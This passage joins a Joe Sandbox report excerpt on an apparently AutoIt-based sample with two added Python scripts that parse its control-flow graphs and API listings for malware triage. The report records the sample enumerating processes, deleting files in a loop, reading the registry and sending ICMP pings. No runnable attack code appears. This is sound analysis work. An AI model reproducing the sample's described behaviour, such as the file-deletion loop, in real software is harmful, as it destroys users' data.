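Grammar inferred from the listings on this page (an assumption, not a
documented format): whitespace-separated tokens; a node is a decimal id
followed by a hex address or range ("1035 11405c-11408d"), and the tokens up
to the next node or edge are its labels ("call c1207 * 3", "FindNextFileW",
"59 API calls"); an edge is "src->dst". The first node is the entry block.
"""
import re
from collections import deque

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
# Win32 export names (FindNextFileW) and CRT helpers (_memset, __cinit).
# The plugin's own function tags (e.g. "Mailbox") match too and are kept.
API_NAME = re.compile(r"^(?:_+\w+|[A-Z][A-Za-z0-9_]+)$")

# Copied verbatim from the listing for the function at 0x114005 on this page.
SAMPLE = (
    "control_flow_graph 1024 114005-11404c call c1207 * 3 call d0284 call 114fec "
    "1035 11405c-11408d call d0119 FindFirstFileW 1024->1035 1036 11404e-114057 "
    "call c1900 1024->1036 1040 1140fc-114103 FindClose 1035->1040 1041 "
    "11408f-114091 1035->1041 1036->1035 1043 114107-114129 call c1cb6 * 3 "
    "1040->1043 1041->1040 1042 114093-114098 1041->1042 1044 1140d7-1140e9 "
    "FindNextFileW 1042->1044 1045 11409a-1140d5 call c1c9c call c17e0 call "
    "c1900 DeleteFileW 1042->1045 1044->1041 1049 1140eb-1140f1 1044->1049 "
    "1045->1044 1059 1140f3-1140fa FindClose 1045->1059 1049->1041 1059->1043"
)


def parse_cfg(text):
    """Return (nodes, edges). nodes maps id -> {"addr", "calls", "apis"} where
    calls is a list of [callee, repeat-count]; edges is a list of (src, dst)."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        m = EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_ID.match(t) and nxt in ("API", "library"):
            i += 3                                  # "59 API calls", "2 library calls"
        elif NODE_ID.match(t) and ADDR.match(nxt):
            cur = int(t)
            nodes[cur] = {"addr": nxt, "calls": [], "apis": []}
            i += 2
        elif cur is None:
            raise ValueError("label %r before the first node" % t)
        elif t == "call":
            nodes[cur]["calls"].append([nxt, 1])
            i += 2
        elif t == "*" and nodes[cur]["calls"]:
            nodes[cur]["calls"][-1][1] = int(nxt)  # "call c1207 * 3"
            i += 2
        else:
            if API_NAME.match(t):
                nodes[cur]["apis"].append(t)
            i += 1                                  # anything else is noise
    return nodes, edges


def successors(edges):
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def reachable(starts, succ):
    """All nodes reachable from the given start nodes (BFS)."""
    seen, todo = set(), deque(starts)
    while todo:
        n = todo.popleft()
        if n not in seen:
            seen.add(n)
            todo.extend(succ.get(n, ()))
    return seen


def loop_nodes(nodes, edges):
    """Nodes that can reach themselves again, i.e. the bodies of loops."""
    succ = successors(edges)
    return {n for n in nodes if n in reachable(succ.get(n, ()), succ)}


def all_apis(text):
    nodes, _ = parse_cfg(text)
    return sorted({a for n in nodes.values() for a in n["apis"]})


def apis_in_loops(text):
    """API names that execute inside a loop of the graph, sorted."""
    nodes, edges = parse_cfg(text)
    return sorted({a for n in loop_nodes(nodes, edges) for a in nodes[n]["apis"]})


if __name__ == "__main__":
    print("APIs:", all_apis(SAMPLE))
    print("APIs inside loops:", apis_in_loops(SAMPLE))
```

The same parser reads the longer listings on this page (the 0x113ce2 record with MoveFileW, and the edge lists that also carry "N API calls" and "Mailbox" tags), which is why those label forms are handled; the loop test is a plain self-reachability check, adequate for graphs of this size.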
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0011419B
                                          • CloseHandle.KERNEL32(00000000), ref: 00114245
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 4d6db1060924986fb8858f8d7cb62a991b4992e759189794b79caa9ab3536a7f
                                          • Instruction ID: d8a4fbbd49749873b28b83e60f3c600c91a144fd0880d3cca4169d5be3ba7c64
                                          • Opcode Fuzzy Hash: 4d6db1060924986fb8858f8d7cb62a991b4992e759189794b79caa9ab3536a7f
                                          • Instruction Fuzzy Hash: A63182711083419FD305EF50E885FEFBBE8AF9A750F40052DF585821A2EB719989CB92
                                          APIs
                                            • Part of subcall function 000C3740: CharUpperBuffW.USER32(?,001771DC,00000000,?,00000000,001771DC,?,000B53A5,?,?,?,?), ref: 000C375D
                                          • _memmove.LIBCMT ref: 000BB68A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_memmove
                                          • String ID:
                                          • API String ID: 2819905725-0
                                          • Opcode ID: ac3932016782984b9a9a68948ff145114d426837d39f94e6007741b8ac3ff3da
                                          • Instruction ID: 16c67450cb448f05cfcb58a7eb62cc52b3d499f6d8c387fb27802cdbfde9f146
                                          • Opcode Fuzzy Hash: ac3932016782984b9a9a68948ff145114d426837d39f94e6007741b8ac3ff3da
                                          • Instruction Fuzzy Hash: 99A29C706087419FD760DF18C480BAAB7E1FF84314F14896DE99A8B762DBB0ED45CB92
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,000FFC86), ref: 0011495A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011496B
                                          • FindClose.KERNEL32(00000000), ref: 0011497B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: c062df808a333d9ffc4317ee44292122711290dca4765ec4b5e7b04d318200b1
                                          • Instruction ID: 587e7285880d6934010d2fef17a1ba855d070927baac4c4c3b3f0b7409aa6b5f
                                          • Opcode Fuzzy Hash: c062df808a333d9ffc4317ee44292122711290dca4765ec4b5e7b04d318200b1
                                          • Instruction Fuzzy Hash: 87E0DF3582090AAB9214A738EC0D8EA775C9F0F73DF100729FA35C24E0EBB099C48696
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b7ed3d36e3b9364d11a5f49c114e4daf846d8727e412eb0a705b3adc704f76c
                                          • Instruction ID: 75e3bb00de263771d8602ce05effde71d0c95e1e1243d32bffa44483dd379d7f
                                          • Opcode Fuzzy Hash: 3b7ed3d36e3b9364d11a5f49c114e4daf846d8727e412eb0a705b3adc704f76c
                                          • Instruction Fuzzy Hash: 5922AD7090421ADFDB64DF58C480AFEB7F0FF19300F14816AEA56AB352D774A985CB91
                                          APIs
                                          • timeGetTime.WINMM ref: 000BBF57
                                            • Part of subcall function 000B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 000F36B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePeekSleepTimetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                          • API String ID: 1792118007-922114024
                                          • Opcode ID: 57c71affaa39caec0e2576abbd8f0843152733e1699470a42fc91bf2f551ea52
                                          • Instruction ID: 3ca7dc7b29663bd768e97a45bb1a31a517646096c68ed738960e960f5fb8dd74
                                          • Opcode Fuzzy Hash: 57c71affaa39caec0e2576abbd8f0843152733e1699470a42fc91bf2f551ea52
                                          • Instruction Fuzzy Hash: DCC2AD70608341DFD728DF24C884BAEB7E5BF84314F14491DF69A976A2CB71E984DB82

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                          • RegisterClassExW.USER32(00000030), ref: 000B346E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                          • InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                          • LoadIconW.USER32(000000A9), ref: 000B34C2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
                                          • Instruction ID: 7a980efae206888d325cfcd525d49b11b8a92c04a10c18575955d05e4cead983
                                          • Opcode Fuzzy Hash: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
                                          • Instruction Fuzzy Hash: F33125B1844309AFDB528FA4DC89AC9BBF0FF0A310F10455AE694E66A0D3B915C1CF92

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                          • RegisterClassExW.USER32(00000030), ref: 000B346E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                          • InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                          • LoadIconW.USER32(000000A9), ref: 000B34C2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
                                          • Instruction ID: b5e7e8386d21bc557ad486613bd5dc8f2986011b62d2b6122d5fe3866320c3cc
                                          • Opcode Fuzzy Hash: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
                                          • Instruction Fuzzy Hash: 0C21E4B5954308AFDB01DFA5EC89BDDBBF4FB09701F10411AFA14A66A0D7B11580CF92

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 000D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000C3094), ref: 000D00ED
                                            • Part of subcall function 000D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000C309F), ref: 000D08E3
                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C30E2
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001001BA
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001001FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00100239
                                          • _wcscat.LIBCMT ref: 00100292
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: b00c2dcfade66fa35d4f0a62ab861659adf45dea6f47620884b5916a69f8acaa
                                          • Instruction ID: 88273f9143eb242e3e0767153543137d3b43dfc37f89a917f557c5d624935ada
                                          • Opcode Fuzzy Hash: b00c2dcfade66fa35d4f0a62ab861659adf45dea6f47620884b5916a69f8acaa
                                          • Instruction Fuzzy Hash: 93716E714493019AC305EF65D889AAFBBF8FF59351F40052EF489972B2EF709984CB52

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000C5156
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
                                          • LoadIconW.USER32(00000063), ref: 000C517C
                                          • LoadIconW.USER32(000000A4), ref: 000C518E
                                          • LoadIconW.USER32(000000A2), ref: 000C51A0
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
                                          • RegisterClassExW.USER32(?), ref: 000C521C
                                            • Part of subcall function 000B3411: GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                            • Part of subcall function 000B3411: RegisterClassExW.USER32(00000030), ref: 000B346E
                                            • Part of subcall function 000B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                            • Part of subcall function 000B3411: InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                            • Part of subcall function 000B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                            • Part of subcall function 000B3411: LoadIconW.USER32(000000A9), ref: 000B34C2
                                            • Part of subcall function 000B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
                                          • Instruction ID: a315a7cc2690b025b2990bcee9888a7b1e4c28343014fbe1a41104d83578cf23
                                          • Opcode Fuzzy Hash: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
                                          • Instruction Fuzzy Hash: E0214874944308AFEB119FA5ED09B9DBBB5FB08311F00012AF618A66E2D7B665D0CF84

                                          Control-flow Graph

[Control-flow graph rendered in the original report (legend: Executed / Not Executed); basic blocks span 125e1d-125ffe and call WSAStartup, inet_addr, gethostbyname, IcmpCreateFile, IcmpSendEcho, IcmpCloseHandle and WSACleanup as listed under APIs below.]
                                          APIs
                                          • WSAStartup.WS2_32(00000101,?), ref: 00125E7E
                                          • inet_addr.WSOCK32(?,?,?), ref: 00125EC3
                                          • gethostbyname.WS2_32(?), ref: 00125ECF
                                          • IcmpCreateFile.IPHLPAPI ref: 00125EDD
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F4D
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F63
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00125FD8
                                          • WSACleanup.WSOCK32 ref: 00125FDE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 82b28957bc46b1f812f6bdc51f5bb657cfd3537c3b1b0e414ec64ae30a6ceaa9
                                          • Instruction ID: 2ae96ca462434e41b79f4a3507258ae72e5abbc7fa775f3705f91d817c97b7ca
                                          • Opcode Fuzzy Hash: 82b28957bc46b1f812f6bdc51f5bb657cfd3537c3b1b0e414ec64ae30a6ceaa9
                                          • Instruction Fuzzy Hash: EF51CC316046109FD721EF24ED89B6AB7E1EF48720F144929FA95DB2E2DB70ED50CB42
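The entries above at 0011416D (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW), 000C30E2 (RegOpenKeyExW and RegQueryValueExW on Software\AutoIt v3\AutoIt) and 00125E7E (WSAStartup through IcmpSendEcho and WSACleanup) are the kind of per-function API groupings an analyst reads off a Joe Sandbox report to label what a function does. The Python script below is an added example and is not part of the report or of Joe Sandbox: it parses entries written in the report's own "APIs" layout (the excerpt is copied from the three entries named above), groups the calls per function, applies this example's own API-combination heuristics (the tag names and rules are assumptions, not Joe Sandbox signatures) and pulls out the literal string arguments the sandbox resolved, such as the registry path.

```python
"""Group Joe Sandbox 'APIs' entries into behaviour categories.

Added example, not part of the Joe Sandbox report: REPORT_EXCERPT is copied
from the report's own function entries; the BEHAVIOURS rules are this
example's own heuristics (assumption), not Joe Sandbox signatures.
"""
import re
from collections import namedtuple

# Excerpt in the report's own layout (constructed from the entries above).
REPORT_EXCERPT = r"""
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
• Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
• Process32NextW.KERNEL32(00000000,?), ref: 0011419B
• CloseHandle.KERNEL32(00000000), ref: 00114245
Memory Dump Source
APIs
  • Part of subcall function 000D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000C3094), ref: 000D00ED
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C30E2
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001001BA
• RegCloseKey.ADVAPI32(?), ref: 00100239
Strings
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00125E7E
• inet_addr.WSOCK32(?,?,?), ref: 00125EC3
• gethostbyname.WS2_32(?), ref: 00125ECF
• IcmpCreateFile.IPHLPAPI ref: 00125EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F4D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00125FD8
• WSACleanup.WSOCK32 ref: 00125FDE
Strings
"""

ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

# One API line: optional 'Part of subcall function X:' prefix, Name.MODULE,
# optional '(arg,arg,...)', then 'ref: ADDR'.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Arguments the sandbox could not resolve ('?') or plain 32-bit values.
OPAQUE_ARG = re.compile(r"^(?:\?|[0-9A-Fa-f]{8})$")

# Behaviour tag -> groups of API names; an entry gets the tag when it calls at
# least one API from every group. Heuristics of this example (assumption).
BEHAVIOURS = {
    "process-enumeration": (
        {"CreateToolhelp32Snapshot"},
        {"Process32First", "Process32FirstW", "Process32Next", "Process32NextW"},
    ),
    "icmp-reachability-check": ({"IcmpCreateFile"}, {"IcmpSendEcho", "IcmpSendEcho2"}),
    "registry-read": (
        {"RegOpenKeyExA", "RegOpenKeyExW"},
        {"RegQueryValueExA", "RegQueryValueExW"},
    ),
    "directory-enumeration": (
        {"FindFirstFileA", "FindFirstFileW"},
        {"FindNextFileA", "FindNextFileW"},
    ),
}


def parse_entries(text):
    """Split report text into function entries: each 'APIs' heading starts one,
    'Strings' or 'Memory Dump Source' ends it. Returns a list of ApiCall lists."""
    entries, current = [], None
    for line in text.splitlines():
        heading = line.strip()
        if heading == "APIs":
            current = []
            entries.append(current)
            continue
        if current is None:
            continue
        if heading in ("Strings", "Memory Dump Source"):
            current = None
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            current.append(ApiCall(m.group("name"), m.group("module").upper(),
                                   args, m.group("ref").upper(), m.group("sub")))
    return [e for e in entries if e]


def classify(entry):
    """Behaviour tags whose every API group is hit by this entry (subcalls included)."""
    names = {call.name for call in entry}
    return sorted(tag for tag, groups in BEHAVIOURS.items()
                  if all(names & group for group in groups))


def string_args(entry):
    """Literal arguments the sandbox resolved from memory (registry paths, value
    names, window-class names), in first-seen order."""
    seen = []
    for call in entry:
        for arg in call.args:
            if arg and not OPAQUE_ARG.match(arg) and arg not in seen:
                seen.append(arg)
    return seen


def triage(text):
    """One summary dict per function entry, keyed by the first direct call's ref."""
    rows = []
    for entry in parse_entries(text):
        first = next((c for c in entry if c.subcall_of is None), entry[0])
        rows.append({"ref": first.ref, "apis": [c.name for c in entry],
                     "behaviours": classify(entry), "strings": string_args(entry)})
    return rows


if __name__ == "__main__":
    for row in triage(REPORT_EXCERPT):
        print(row["ref"], row["behaviours"], row["strings"])
```

Run against a whole report export, `triage()` gives one row per function with its behaviour tags and resolved strings, which is enough to jump straight to the process-enumeration and ICMP functions instead of reading every entry; subcall lines are kept in the entry so a tag can also fire on a wrapped helper.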

                                          Control-flow Graph

[Control-flow graph rendered in the original report (legend: Executed / Not Executed); basic blocks span c4d83-c4ec6 and 100965-100a4f and call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus.]
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 000C4E22
                                          • KillTimer.USER32(?,00000001), ref: 000C4E4C
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C4E6F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C4E7A
                                          • CreatePopupMenu.USER32 ref: 000C4E8E
                                          • PostQuitMessage.USER32(00000000), ref: 000C4EAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
• Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 099a1e4d69443d5ac45087f5f714ddc3ef66537bfc31e62e337bd9e74e7312a9
                                          • Instruction ID: 5af3a1bdc15f9970c66786219d97376190357a29c83df42f5beb7b9dfd1219f9
                                          • Opcode Fuzzy Hash: 099a1e4d69443d5ac45087f5f714ddc3ef66537bfc31e62e337bd9e74e7312a9
                                          • Instruction Fuzzy Hash: C3413A3124860AABDB266F24DC1DFFE36A5F755301F02012DFA46925E3CBB0ACD09762

                                          Control-flow Graph

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00100C5B
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
